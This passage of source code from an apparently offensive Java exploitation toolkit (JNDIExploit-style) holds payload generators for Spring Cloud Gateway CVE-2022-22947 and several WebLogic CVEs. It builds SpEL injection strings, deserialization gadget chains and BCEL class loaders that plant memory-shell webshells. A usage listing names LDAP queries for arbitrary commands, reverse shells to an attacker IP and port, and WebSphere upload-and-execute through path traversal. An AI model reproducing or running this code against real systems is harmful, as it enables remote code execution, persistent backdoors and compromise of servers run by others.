payloadTemplate.replace("{code}", bcelCodeStr); 36 | String payload = "managerMethod=validate&arguments=" + URLEncoder.encode(Util.GZIPCompress(payloadTmp), "UTF-8"); 37 | return payload; 38 | } 39 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 40 | String payload = (String) getObject(type, trojanType); 41 | return payload.getBytes(); 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /src/main/java/core/payloads/SpringGateWay_CVE_2022_22947.java: -------------------------------------------------------------------------------- 1 | package core.payloads; 2 | 3 | import core.GenerateMemShell; 4 | import core.enumtypes.PayloadType; 5 | import core.memshell.NettyHandlerMemShell; 6 | import core.utils.Util; 7 | 8 | public class SpringGateWay_CVE_2022_22947 { 9 | public static Object getObject(PayloadType type, String path) throws Exception { 10 | String className = ""; 11 | String base64CodeStr = ""; 12 | String payloadTemplate = "{\"predicates\":[\n" + 13 | "{\n" + 14 | "\"name\":\"Path\",\n" + 15 | "\"args\":{\n" + 16 | "\t\"_genkey_0\":\"/{path}/**\"\n" + 17 | "}\n" + 18 | "}\n" + 19 | "],\n" + 20 | " \"id\": \"{path}\",\n" + 21 | " \"filters\": [{\n" + 22 | " \"name\": \"AddResponseHeader\",\n" + 23 | " \"args\": {\n" + 24 | " \"name\": \"Result\",\n" + 25 | " \"value\": \"#{T(org.springframework.cglib.core.ReflectUtils).defineClass('{classname}',T(org.springframework.util.Base64Utils).decodeFromString('{code}'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping, '/{path}')}\"\n" + 26 | " }\n" + 27 | " }],\n" + 28 | " \"uri\": \"http://test.com\"\n" + 29 | "}"; 30 | 31 | switch (type){ 32 | case springwebfluxhandlermemshell: 33 | base64CodeStr = GenerateMemShell.generateMemShell("SpringWebfluxHandlerMemShell", "BASE64", "8"); 34 | className = "SpringWebfluxHandlerMemShell"; 35 | break; 36 | case nettyhandlermemshell: 37 | base64CodeStr = Util.base64Encode(Util.getClassBytes(NettyHandlerMemShell.class)); 38 | className = "core.memshell.NettyHandlerMemShell"; 39 | break; 40 | } 41 | // SpringWebfluxHandlerMemShell 采用了lambda表达式,需要jdk1.8+支持,因此采用动态编译 42 | 43 | return payloadTemplate.replace("{classname}", className).replace("{code}", base64CodeStr).replace("{path}", path).replace("\n", ""); 44 | } 45 | 46 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 47 | String payload = getObject(type, trojanType).toString(); 48 | return payload.getBytes(); 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /src/main/java/core/payloads/Weblogic_0Day_JDK7.java: -------------------------------------------------------------------------------- 1 | package core.payloads; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.Reflections; 6 | import core.utils.Util; 7 | 8 | import javax.xml.transform.Templates; 9 | import java.lang.reflect.InvocationHandler; 10 | import java.rmi.MarshalledObject; 11 | import java.util.HashMap; 12 | import java.util.LinkedHashSet; 13 | 14 | public class Weblogic_0Day_JDK7 { 15 | public static Object getObject_(PayloadType type, String trojanType) throws Exception { 16 | Object templates = Gadgets.createTemplatesImpl(type, trojanType); 17 | String zeroHashCodeStr = "f5a5a608"; 18 | HashMap map = new HashMap(); 19 | map.put(zeroHashCodeStr, "foo"); 20 | InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map); 21 | Reflections.setFieldValue(tempHandler, "type", Templates.class); 22 | Templates proxy = Gadgets.createProxy(tempHandler, Templates.class); 23 | LinkedHashSet set = new LinkedHashSet(); 24 | set.add(templates); 25 | set.add(proxy); 26 | map.put(zeroHashCodeStr, templates); 27 | 28 | return set; 29 | } 30 | 31 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 32 | Object var2 = getObject_(type, trojanType); 33 | var2=new MarshalledObject(var2); 34 | String zeroHashCodeStr = "f5a5a608"; 35 | HashMap map = new HashMap(); 36 | map.put(zeroHashCodeStr, "foo"); 37 | InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map); 38 | Reflections.setFieldValue(tempHandler, "type", MarshalledObject.class); 39 | Object proxy = Gadgets.createProxy(tempHandler, Override.class); 40 | LinkedHashSet set = new LinkedHashSet(); 41 | set.add(var2); 42 | set.add(proxy); 43 | map.put(zeroHashCodeStr, var2); // swap in real object 44 | 45 | return set; 46 | } 47 | 48 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 49 | return Util.serialize(getObject(type, trojanType)); 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /src/main/java/core/payloads/Weblogic_CVE_2020_14756.java: -------------------------------------------------------------------------------- 1 | package core.payloads; 2 | 3 | import com.tangosol.coherence.servlet.AttributeHolder; 4 | import com.tangosol.internal.util.invoke.ClassDefinition; 5 | import com.tangosol.internal.util.invoke.ClassIdentity; 6 | import com.tangosol.internal.util.invoke.RemoteConstructor; 7 | import core.enumtypes.PayloadType; 8 | import core.memshell.CommandMemShell; 9 | import core.memshell.WeblogicFilterMemShell_CVE_2020_14756; 10 | import core.memshell.WeblogicListenerMemShell_CVE_2020_14756; 11 | 12 | import core.utils.Util; 13 | import javassist.ClassClassPath; 14 | import javassist.ClassPool; 15 | import javassist.CtClass; 16 | 17 | import java.lang.reflect.Method; 18 | 19 | public class Weblogic_CVE_2020_14756 { 20 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 21 | ClassIdentity classIdentity = null; 22 | CtClass ctClass = null; 23 | ClassPool cp = ClassPool.getDefault(); 24 | ClassClassPath classPath = new ClassClassPath(Weblogic_CVE_2020_14756.class); 25 | cp.insertClassPath(classPath); 26 | switch (type){ 27 | case weblogiclistenermemshell: 28 | classIdentity = new ClassIdentity(WeblogicListenerMemShell_CVE_2020_14756.class); 29 | ctClass = cp.get(WeblogicListenerMemShell_CVE_2020_14756.class.getName()); 30 | ctClass.replaceClassName(WeblogicListenerMemShell_CVE_2020_14756.class.getName(), WeblogicListenerMemShell_CVE_2020_14756.class.getName() + "$" + classIdentity.getVersion()); 31 | break; 32 | case weblogicfiltermemshell: 33 | classIdentity = new ClassIdentity(WeblogicFilterMemShell_CVE_2020_14756.class); 34 | ctClass = cp.get(WeblogicFilterMemShell_CVE_2020_14756.class.getName()); 35 | ctClass.replaceClassName(WeblogicFilterMemShell_CVE_2020_14756.class.getName(), WeblogicFilterMemShell_CVE_2020_14756.class.getName() + "$" + classIdentity.getVersion()); 36 | break; 37 | case commandmemshell: 38 | classIdentity = new ClassIdentity(CommandMemShell.class); 39 | ctClass = cp.get(CommandMemShell.class.getName()); 40 | ctClass.replaceClassName(CommandMemShell.class.getName(), CommandMemShell.class.getName() + "$" + classIdentity.getVersion()); 41 | break; 42 | } 43 | 44 | RemoteConstructor constructor = new RemoteConstructor( 45 | new ClassDefinition(classIdentity, ctClass.toBytecode()), 46 | new Object[]{} 47 | ); 48 | ctClass.defrost(); 49 | AttributeHolder attributeHolder = new AttributeHolder(); 50 | Method setInternalValue = attributeHolder.getClass().getDeclaredMethod("setInternalValue", Object.class); 51 | setInternalValue.setAccessible(true); 52 | setInternalValue.invoke(attributeHolder, constructor); 53 | 54 | return attributeHolder; 55 | } 56 | 57 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 58 | Object attributeHolder = getObject(type, trojanType); 59 | return Util.serialize(attributeHolder); 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /src/main/java/core/payloads/Weblogic_CVE_2020_14883.java: -------------------------------------------------------------------------------- 1 | package core.payloads; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.memshell.WeblogicFilterMemShell; 5 | import core.memshell.WeblogicListenerMemShell; 6 | import javassist.CtClass; 7 | import utils.Util; 8 | 9 | 10 | public class Weblogic_CVE_2020_14883 { 11 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 12 | byte[] bytecodes = null; 13 | String payloadTemplate = "nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession('new com.sun.org.apache.bcel.internal.util.ClassLoader().loadClass(\"{code}\").newInstance()')"; 14 | switch (type) { 15 | case weblogiclistenermemshell: 16 | bytecodes = Util.getClassBytes(WeblogicListenerMemShell.class); 17 | break; 18 | case weblogicfiltermemshell: 19 | bytecodes = Util.getClassBytes(WeblogicFilterMemShell.class); 20 | break; 21 | } 22 | 23 | String bcelCodeStr = Util.generateBcelCode2(bytecodes); 24 | return payloadTemplate.replace("{code}", bcelCodeStr).replace("\n", ""); 25 | } 26 | 27 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 28 | String payload = (String) getObject(type, trojanType); 29 | return payload.getBytes(); 30 | } 31 | } -------------------------------------------------------------------------------- /src/main/java/core/payloads/Weblogic_CVE_2020_2883.java: -------------------------------------------------------------------------------- 1 | package core.payloads; 2 | 3 | import com.tangosol.util.comparator.ExtractorComparator; 4 | import com.tangosol.util.extractor.ChainedExtractor; 5 | import com.tangosol.util.extractor.ReflectionExtractor; 6 | import core.enumtypes.PayloadType; 7 | import core.utils.Util; 8 | import utils.weblogic.WeblogicGadget; 9 | 10 | import javax.script.ScriptEngineManager; 11 | import java.lang.reflect.Field; 12 | import java.util.PriorityQueue; 13 | 14 | public class Weblogic_CVE_2020_2883 { 15 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 16 | ReflectionExtractor[] extractors = WeblogicGadget.getReflectionExtractor(type, trojanType); 17 | ChainedExtractor chainedExtractor = new ChainedExtractor(extractors); 18 | ExtractorComparator extractorComparator = new ExtractorComparator(chainedExtractor); 19 | 20 | PriorityQueue priorityQueue = new PriorityQueue(2); 21 | priorityQueue.add("1"); 22 | priorityQueue.add("1"); 23 | Field field = priorityQueue.getClass().getDeclaredField("comparator"); 24 | field.setAccessible(true); 25 | field.set(priorityQueue, extractorComparator); 26 | 27 | Field field2 = priorityQueue.getClass().getDeclaredField("queue"); 28 | field2.setAccessible(true); 29 | Object[] queuearray = (Object[]) field2.get(priorityQueue); 30 | // queuearray[0] = ScriptEngineManager.class; 31 | queuearray[1] = Integer.class; 32 | queuearray[0] = ScriptEngineManager.class; 33 | 34 | return priorityQueue; 35 | } 36 | 37 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 38 | Object priorityQueue = getObject(type, trojanType); 39 | return Util.serialize(priorityQueue); 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /src/main/java/core/utils/Cache.java: -------------------------------------------------------------------------------- 1 | package core.utils; 2 | 3 | import net.jodah.expiringmap.ExpirationPolicy; 4 | import net.jodah.expiringmap.ExpiringMap; 5 | 6 | import java.util.concurrent.TimeUnit; 7 | 8 | public class Cache { 9 | private static ExpiringMap map = ExpiringMap.builder() 10 | .maxSize(1000) 11 | .expiration(30, TimeUnit.SECONDS) 12 | .variableExpiration() 13 | .expirationPolicy(ExpirationPolicy.CREATED) 14 | .build(); 15 | 16 | static{ 17 | try { 18 | //过期时间100年,永不过期的简单方法Z 19 | 20 | } catch (Exception e) { 21 | e.printStackTrace(); 22 | } 23 | } 24 | 25 | public static byte[] get(String key){ 26 | return map.get(key); 27 | } 28 | 29 | public static void set(String key, byte[] bytes){ 30 | map.put(key, bytes); 31 | } 32 | 33 | public static boolean contains(String key){ 34 | return map.containsKey(key); 35 | } 36 | 37 | public static void remove(String key){ 38 | map.remove(key); 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /src/main/java/core/utils/Compiler.java: -------------------------------------------------------------------------------- 1 | package core.utils; 2 | 3 | import javax.tools.*; 4 | import java.io.ByteArrayOutputStream; 5 | import java.io.FilterOutputStream; 6 | import java.io.IOException; 7 | import java.io.OutputStream; 8 | import java.net.URI; 9 | import java.net.URISyntaxException; 10 | import java.net.URL; 11 | import java.net.URLClassLoader; 12 | import java.nio.CharBuffer; 13 | import java.util.*; 14 | 15 | 16 | // reference https://zhuanlan.zhihu.com/p/445335613 17 | public class Compiler { 18 | 19 | public static byte[] createMemShell(String classString) { 20 | try { 21 | JavaCompiler compiler = ToolProvider.getSystemJavaCompiler(); 22 | StandardJavaFileManager standardFileManager = compiler.getStandardFileManager(null, null, null); 23 | ClassJavaFileManager classJavaFileManager = new ClassJavaFileManager(standardFileManager); 24 | StringObject stringObject = new StringObject(new URI("test.java"), JavaFileObject.Kind.SOURCE, classString); 25 | JavaCompiler.CompilationTask task = compiler.getTask(null, classJavaFileManager, null, null, null, Arrays.asList(stringObject)); 26 | if (task.call()) { 27 | ClassJavaFileObject javaFileObject = classJavaFileManager.getClassJavaFileObject(); 28 | return javaFileObject.getBytes(); 29 | } 30 | return null; 31 | } catch (URISyntaxException e) { 32 | return null; 33 | } 34 | } 35 | 36 | public static Map createMemShell(String className, String classString) { 37 | Map results = null; 38 | List options = new ArrayList(); 39 | options.add("-source"); 40 | options.add("1.8"); 41 | options.add("-target"); 42 | options.add("1.8"); 43 | JavaCompiler compiler = ToolProvider.getSystemJavaCompiler(); 44 | StandardJavaFileManager stdManager = compiler.getStandardFileManager(null, null, null); 45 | try { 46 | MemoryJavaFileManager manager = new MemoryJavaFileManager(stdManager); 47 | JavaFileObject javaFileObject = manager.makeStringSource(className + ".java", classString); 48 | JavaCompiler.CompilationTask task = compiler.getTask(null, manager, null, options, null, Arrays.asList(javaFileObject)); 49 | if (task.call()) { 50 | results = manager.getClassBytes(); 51 | } 52 | } catch (Exception e) { 53 | 54 | } 55 | 56 | return results; 57 | } 58 | 59 | public static Map createMemShell(String className, String classString, List options) { 60 | Map results = null; 61 | try { 62 | JavaCompiler compiler = ToolProvider.getSystemJavaCompiler(); 63 | StandardJavaFileManager stdManager = compiler.getStandardFileManager(null, null, null); 64 | MemoryJavaFileManager manager = new MemoryJavaFileManager(stdManager); 65 | JavaFileObject javaFileObject = manager.makeStringSource(className + ".java", classString); 66 | JavaCompiler.CompilationTask task = compiler.getTask(null, manager, null, options, null, Arrays.asList(javaFileObject)); 67 | if (task.call()) { 68 | results = manager.getClassBytes(); 69 | } 70 | } catch (Exception e) { 71 | e.printStackTrace(); 72 | } 73 | return results; 74 | } 75 | 76 | /** 77 | * 自定义fileManager 78 | */ 79 | static class ClassJavaFileManager extends ForwardingJavaFileManager { 80 | 81 | private ClassJavaFileObject classJavaFileObject; 82 | 83 | public ClassJavaFileManager(StandardJavaFileManager fileManager) { 84 | super(fileManager); 85 | } 86 | 87 | public ClassJavaFileObject getClassJavaFileObject() { 88 | return classJavaFileObject; 89 | } 90 | 91 | //这个方法一定要自定义 92 | @Override 93 | public JavaFileObject getJavaFileForOutput(Location location, String className, JavaFileObject.Kind kind, FileObject sibling) throws IOException { 94 | return (classJavaFileObject = new ClassJavaFileObject(className, kind)); 95 | } 96 | } 97 | 98 | /** 99 | * 存储源文件 100 | */ 101 | static class StringObject extends SimpleJavaFileObject { 102 | 103 | private String content; 104 | 105 | public StringObject(URI uri, Kind kind, String content) { 106 | super(uri, kind); 107 | this.content = content; 108 | } 109 | 110 | @Override 111 | public CharSequence getCharContent(boolean ignoreEncodingErrors) throws IOException { 112 | return this.content; 113 | } 114 | } 115 | 116 | /** 117 | * class文件(不需要存到文件中) 118 | */ 119 | static class ClassJavaFileObject extends SimpleJavaFileObject { 120 | 121 | ByteArrayOutputStream outputStream; 122 | 123 | public ClassJavaFileObject(String className, Kind kind) { 124 | super(URI.create(className + kind.extension), kind); 125 | this.outputStream = new ByteArrayOutputStream(); 126 | } 127 | 128 | //这个也要实现 129 | @Override 130 | public OutputStream openOutputStream() throws IOException { 131 | return this.outputStream; 132 | } 133 | 134 | public byte[] getBytes() { 135 | return this.outputStream.toByteArray(); 136 | } 137 | } 138 | 139 | //自定义classloader 140 | static class MyClassLoader extends ClassLoader { 141 | private ClassJavaFileObject stringObject; 142 | 143 | public MyClassLoader(ClassJavaFileObject stringObject) { 144 | this.stringObject = stringObject; 145 | } 146 | 147 | @Override 148 | protected Class findClass(String name) throws ClassNotFoundException { 149 | byte[] bytes = this.stringObject.getBytes(); 150 | return defineClass(name, bytes, 0, bytes.length); 151 | } 152 | } 153 | 154 | } 155 | 156 | class MemoryJavaFileManager extends ForwardingJavaFileManager { 157 | 158 | // compiled classes in bytes: 159 | final Map classBytes = new HashMap(); 160 | 161 | MemoryJavaFileManager(JavaFileManager fileManager) { 162 | super(fileManager); 163 | } 164 | 165 | public Map getClassBytes() { 166 | return new HashMap(this.classBytes); 167 | } 168 | 169 | @Override 170 | public void flush() throws IOException { 171 | } 172 | 173 | @Override 174 | public void close() throws IOException { 175 | classBytes.clear(); 176 | } 177 | 178 | @Override 179 | public JavaFileObject getJavaFileForOutput(Location location, String className, JavaFileObject.Kind kind, 180 | FileObject sibling) throws IOException { 181 | if (kind == JavaFileObject.Kind.CLASS) { 182 | return new MemoryOutputJavaFileObject(className); 183 | } else { 184 | return super.getJavaFileForOutput(location, className, kind, sibling); 185 | } 186 | } 187 | 188 | JavaFileObject makeStringSource(String name, String code) { 189 | return new MemoryInputJavaFileObject(name, code); 190 | } 191 | 192 | static class MemoryInputJavaFileObject extends SimpleJavaFileObject { 193 | 194 | final String code; 195 | 196 | MemoryInputJavaFileObject(String name, String code) { 197 | super(URI.create("string:///" + name), Kind.SOURCE); 198 | this.code = code; 199 | } 200 | 201 | @Override 202 | public CharBuffer getCharContent(boolean ignoreEncodingErrors) { 203 | return CharBuffer.wrap(code); 204 | } 205 | } 206 | 207 | class MemoryOutputJavaFileObject extends SimpleJavaFileObject { 208 | final String name; 209 | 210 | MemoryOutputJavaFileObject(String name) { 211 | super(URI.create("string:///" + name), Kind.CLASS); 212 | this.name = name; 213 | } 214 | 215 | @Override 216 | public OutputStream openOutputStream() { 217 | return new FilterOutputStream(new ByteArrayOutputStream()) { 218 | @Override 219 | public void close() throws IOException { 220 | out.close(); 221 | ByteArrayOutputStream bos = (ByteArrayOutputStream) out; 222 | classBytes.put(name, bos.toByteArray()); 223 | } 224 | }; 225 | } 226 | 227 | } 228 | 229 | /** 230 | * Load class from byte[] which is compiled in memory. 231 | * 232 | * @author michael 233 | */ 234 | static class MemoryClassLoader extends URLClassLoader { 235 | 236 | // class name to class bytes: 237 | Map classBytes = new HashMap(); 238 | 239 | public MemoryClassLoader(Map classBytes) { 240 | super(new URL[0], MemoryClassLoader.class.getClassLoader()); 241 | this.classBytes.putAll(classBytes); 242 | } 243 | 244 | @Override 245 | protected Class findClass(String name) throws ClassNotFoundException { 246 | byte[] buf = classBytes.get(name); 247 | if (buf == null) { 248 | return super.findClass(name); 249 | } 250 | classBytes.remove(name); 251 | return defineClass(name, buf, 0, buf.length); 252 | } 253 | 254 | } 255 | } 256 | -------------------------------------------------------------------------------- /src/main/java/core/utils/Config.java: -------------------------------------------------------------------------------- 1 | package core.utils; 2 | 3 | import com.beust.jcommander.JCommander; 4 | import com.beust.jcommander.Parameter; 5 | import com.beust.jcommander.UnixStyleUsageFormatter; 6 | 7 | public class Config { 8 | public static String codeBase; 9 | 10 | @Parameter(names = {"-i", "--ip"}, description = "Local ip address ", required = true, order = 1) 11 | public static String ip; 12 | 13 | @Parameter(names = {"-l", "--ldapPort"}, description = "Ldap bind port", order = 2) 14 | public static int ldapPort = 1389; 15 | 16 | @Parameter(names = {"-p", "--httpPort"}, description = "Http bind port", order = 3) 17 | public static int httpPort = 8080; 18 | 19 | @Parameter(names = {"-u", "--usage"}, description = "Show usage", order = 4) 20 | public static boolean showUsage; 21 | 22 | @Parameter(names = {"-h", "--help"}, help = true, description = "Show this help") 23 | private static boolean help = false; 24 | 25 | public static void applyCmdArgs(String[] args) { 26 | //process cmd args 27 | JCommander jc = JCommander.newBuilder() 28 | .addObject(new Config()) 29 | .build(); 30 | try { 31 | jc.parse(args); 32 | } catch (Exception e) { 33 | if (!showUsage) { 34 | System.out.println("Error: " + e.getMessage() + "\n"); 35 | help = true; 36 | } 37 | } 38 | 39 | if (showUsage) { 40 | String ip = (Config.ip != null) ? Config.ip : "[IP]"; 41 | String port = (Config.ip != null) ? Config.ldapPort + "" : "[PORT]"; 42 | 43 | System.out.println("Supported LADP Queries:"); 44 | System.out.println("* all words are case INSENSITIVE when send to ldap server"); 45 | String prefix = "ldap://" + Config.ip + ":" + Config.ldapPort + "/"; 46 | System.out.println("\n[+] Basic Queries: " + prefix + "Basic/[PayloadType]/[Params], e.g."); 47 | System.out.println(" " + prefix + "Basic/Dnslog/[domain]"); 48 | System.out.println(" " + prefix + "Basic/Command/[cmd]"); 49 | System.out.println(" " + prefix + "Basic/Command/Base64/[base64_encoded_cmd]"); 50 | System.out.println(" " + prefix + "Basic/ReverseShell/[ip]/[port] ---windows NOT supported"); 51 | System.out.println(" " + prefix + "Basic/TomcatEcho"); 52 | System.out.println(" " + prefix + "Basic/SpringEcho"); 53 | System.out.println(" " + prefix + "Basic/WeblogicEcho"); 54 | System.out.println(" " + prefix + "Basic/TomcatMemshell1"); 55 | System.out.println(" " + prefix + "Basic/TomcatMemshell2 ---need extra header [shell: true]"); 56 | System.out.println(" " + prefix + "Basic/JettyMemshell"); 57 | System.out.println(" " + prefix + "Basic/WeblogicMemshell1"); 58 | System.out.println(" " + prefix + "Basic/WeblogicMemshell2"); 59 | System.out.println(" " + prefix + "Basic/JBossMemshell"); 60 | System.out.println(" " + prefix + "Basic/WebsphereMemshell"); 61 | System.out.println(" " + prefix + "Basic/SpringMemshell"); 62 | 63 | System.out.println("\n[+] Deserialize Queries: " + prefix + "Deserialization/[GadgetType]/[PayloadType]/[Params], e.g."); 64 | System.out.println(" " + prefix + "Deserialization/URLDNS/[domain]"); 65 | System.out.println(" " + prefix + "Deserialization/CommonsCollectionsK1/Dnslog/[domain]"); 66 | System.out.println(" " + prefix + "Deserialization/CommonsCollectionsK2/Command/Base64/[base64_encoded_cmd]"); 67 | System.out.println(" " + prefix + "Deserialization/CommonsBeanutils1/ReverseShell/[ip]/[port] ---windows NOT supported"); 68 | System.out.println(" " + prefix + "Deserialization/CommonsBeanutils2/TomcatEcho"); 69 | System.out.println(" " + prefix + "Deserialization/C3P0/SpringEcho"); 70 | System.out.println(" " + prefix + "Deserialization/Jdk7u21/WeblogicEcho"); 71 | System.out.println(" " + prefix + "Deserialization/Jre8u20/TomcatMemshell"); 72 | System.out.println(" " + prefix + "Deserialization/CVE_2020_2555/WeblogicMemshell1"); 73 | System.out.println(" " + prefix + "Deserialization/CVE_2020_2883/WeblogicMemshell2 ---ALSO support other memshells"); 74 | 75 | System.out.println("\n[+] TomcatBypass Queries"); 76 | System.out.println(" " + prefix + "TomcatBypass/Dnslog/[domain]"); 77 | System.out.println(" " + prefix + "TomcatBypass/Command/[cmd]"); 78 | System.out.println(" " + prefix + "TomcatBypass/Command/Base64/[base64_encoded_cmd]"); 79 | System.out.println(" " + prefix + "TomcatBypass/ReverseShell/[ip]/[port] ---windows NOT supported"); 80 | System.out.println(" " + prefix + "TomcatBypass/TomcatEcho"); 81 | System.out.println(" " + prefix + "TomcatBypass/SpringEcho"); 82 | System.out.println(" " + prefix + "TomcatBypass/TomcatMemshell1"); 83 | System.out.println(" " + prefix + "TomcatBypass/TomcatMemshell2 ---need extra header [shell: true]"); 84 | System.out.println(" " + prefix + "TomcatBypass/SpringMemshell"); 85 | 86 | System.out.println("\n[+] GroovyBypass Queries"); 87 | System.out.println(" " + prefix + "GroovyBypass/Command/[cmd]"); 88 | System.out.println(" " + prefix + "GroovyBypass/Command/Base64/[base64_encoded_cmd]"); 89 | 90 | System.out.println("\n[+] WebsphereBypass Queries"); 91 | System.out.println(" " + prefix + "WebsphereBypass/List/file=[file or directory]"); 92 | System.out.println(" " + prefix + "WebsphereBypass/Upload/Dnslog/[domain]"); 93 | System.out.println(" " + prefix + "WebsphereBypass/Upload/Command/[cmd]"); 94 | System.out.println(" " + prefix + "WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]"); 95 | System.out.println(" " + prefix + "WebsphereBypass/Upload/ReverseShell/[ip]/[port] ---windows NOT supported"); 96 | System.out.println(" " + prefix + "WebsphereBypass/Upload/WebsphereMemshell"); 97 | System.out.println(" " + prefix + "WebsphereBypass/RCE/path=[uploaded_jar_path] ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp"); 98 | 99 | System.exit(0); 100 | } 101 | 102 | // //获取当前 Jar 的名称 103 | // String jarPath = Starter.class.getProtectionDomain().getCodeSource().getLocation().getPath(); 104 | jc.setProgramName("java -jar JNDIExploit-1.2-SNAPSHOT.jar"); 105 | jc.setUsageFormatter(new UnixStyleUsageFormatter(jc)); 106 | 107 | if (help) { 108 | jc.usage(); //if -h specified, show help and exit 109 | System.exit(0); 110 | } 111 | 112 | // 特别注意:最后一个反斜杠不能少啊 113 | Config.codeBase = "http://" + Config.ip + ":" + Config.httpPort + "/"; 114 | } 115 | } 116 | -------------------------------------------------------------------------------- /src/main/java/core/utils/MyURLClassLoader.java: -------------------------------------------------------------------------------- 1 | package core.utils; 2 | 3 | import java.io.File; 4 | import java.lang.reflect.InvocationTargetException; 5 | import java.lang.reflect.Method; 6 | import java.net.MalformedURLException; 7 | import java.net.URL; 8 | import java.net.URLClassLoader; 9 | 10 | public class MyURLClassLoader { 11 | private URLClassLoader classLoader; 12 | 13 | public MyURLClassLoader(String jarName) { 14 | try { 15 | classLoader = getURLClassLoader(jarName); 16 | } catch (MalformedURLException e) { 17 | e.printStackTrace(); 18 | } 19 | } 20 | 21 | public Class loadClass(String className) { 22 | try { 23 | //由于我项目中已经有了 commons-beanutils:1.9.4,如果使用 loadClass 方法,加载的是项目 ClassPath 下的 commons-beanutils 24 | //为了避免这种情况,所以调用了 findClass 方法 25 | Method method = URLClassLoader.class.getDeclaredMethod("findClass", new Class[]{String.class}); 26 | method.setAccessible(true); 27 | Class clazz = (Class) method.invoke(this.classLoader, new Object[]{className}); 28 | return clazz; 29 | } catch (NoSuchMethodException e) { 30 | e.printStackTrace(); 31 | } catch (IllegalAccessException e) { 32 | e.printStackTrace(); 33 | } catch (InvocationTargetException e) { 34 | e.printStackTrace(); 35 | } 36 | 37 | return null; 38 | } 39 | 40 | private URLClassLoader getURLClassLoader(String jarName) throws MalformedURLException { 41 | URL url = this.getClass().getClassLoader().getResource("libs" + File.separator + jarName); 42 | URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{url}); 43 | return urlClassLoader; 44 | } 45 | 46 | public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException { 47 | MyURLClassLoader classLoader = new MyURLClassLoader("commons-beanutils-1.9.2.jar"); 48 | Class clazz = classLoader.loadClass("org.apache.commons.beanutils.BeanComparator"); 49 | // Class clazz = classLoader.loadClass("org.apache.commons.beanutils.BeanComparator"); 50 | Object comparator = clazz.getDeclaredConstructor(new Class[]{String.class}).newInstance(new Object[]{"lowestSetBit"}); 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /src/main/java/core/utils/Util.java: -------------------------------------------------------------------------------- 1 | package core.utils; 2 | 3 | import java.io.ByteArrayOutputStream; 4 | import java.io.IOException; 5 | import java.io.InputStream; 6 | import java.io.ObjectOutputStream; 7 | import java.lang.reflect.Method; 8 | import java.util.Random; 9 | import java.util.zip.GZIPOutputStream; 10 | 11 | public class Util { 12 | 13 | public static final String GZIP_ENCODE_UTF_8 = "UTF-8"; 14 | 15 | public static String getRandomString() { 16 | String str = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; 17 | StringBuilder sb = new StringBuilder(); 18 | for (int i = 0; i < 10; i++) { 19 | char ch = str.charAt(new Random().nextInt(str.length())); 20 | sb.append(ch); 21 | } 22 | return sb.toString(); 23 | } 24 | 25 | public static String getClassCode(Class clazz) throws Exception { 26 | byte[] bytes = getClassBytes(clazz); 27 | String result = Util.base64Encode(bytes); 28 | 29 | return result; 30 | } 31 | 32 | public static byte[] getClassBytes(Class clazz) throws Exception { 33 | String className = clazz.getName(); 34 | String resoucePath = className.replaceAll("\\.", "/") + ".class"; 35 | InputStream in = Util.class.getProtectionDomain().getClassLoader().getResourceAsStream(resoucePath); 36 | byte[] bytes = new byte[1024]; 37 | ByteArrayOutputStream baous = new ByteArrayOutputStream(); 38 | int len = 0; 39 | while ((len = in.read(bytes)) != -1) { 40 | baous.write(bytes, 0, len); 41 | } 42 | 43 | in.close(); 44 | baous.close(); 45 | 46 | return baous.toByteArray(); 47 | } 48 | 49 | public static String base64Encode(byte[] bytes) throws Exception { 50 | String result; 51 | 52 | try { 53 | Class clazz = Class.forName("java.util.Base64"); 54 | Method method = clazz.getDeclaredMethod("getEncoder"); 55 | Object obj = method.invoke(null); 56 | method = obj.getClass().getDeclaredMethod("encodeToString", byte[].class); 57 | obj = method.invoke(obj, bytes); 58 | result = (String) obj; 59 | } catch (ClassNotFoundException e) { 60 | Class clazz = Class.forName("sun.misc.BASE64Encoder"); 61 | Method method = clazz.getMethod("encodeBuffer", byte[].class); 62 | Object obj = method.invoke(clazz.newInstance(), bytes); 63 | result = (String) obj; 64 | result = result.replaceAll("\r|\n|\r\n", ""); 65 | } 66 | 67 | return result; 68 | } 69 | 70 | public static byte[] base64Decode(String str) throws Exception { 71 | byte[] bytes; 72 | 73 | try { 74 | Class clazz = Class.forName("java.util.Base64"); 75 | Method method = clazz.getDeclaredMethod("getDecoder"); 76 | Object obj = method.invoke(null); 77 | method = obj.getClass().getDeclaredMethod("decode", String.class); 78 | obj = method.invoke(obj, str); 79 | bytes = (byte[]) obj; 80 | } catch (ClassNotFoundException e) { 81 | Class clazz = Class.forName("sun.misc.BASE64Decoder"); 82 | Method method = clazz.getMethod("decodeBuffer", String.class); 83 | Object obj = method.invoke(clazz.newInstance(), str); 84 | bytes = (byte[]) obj; 85 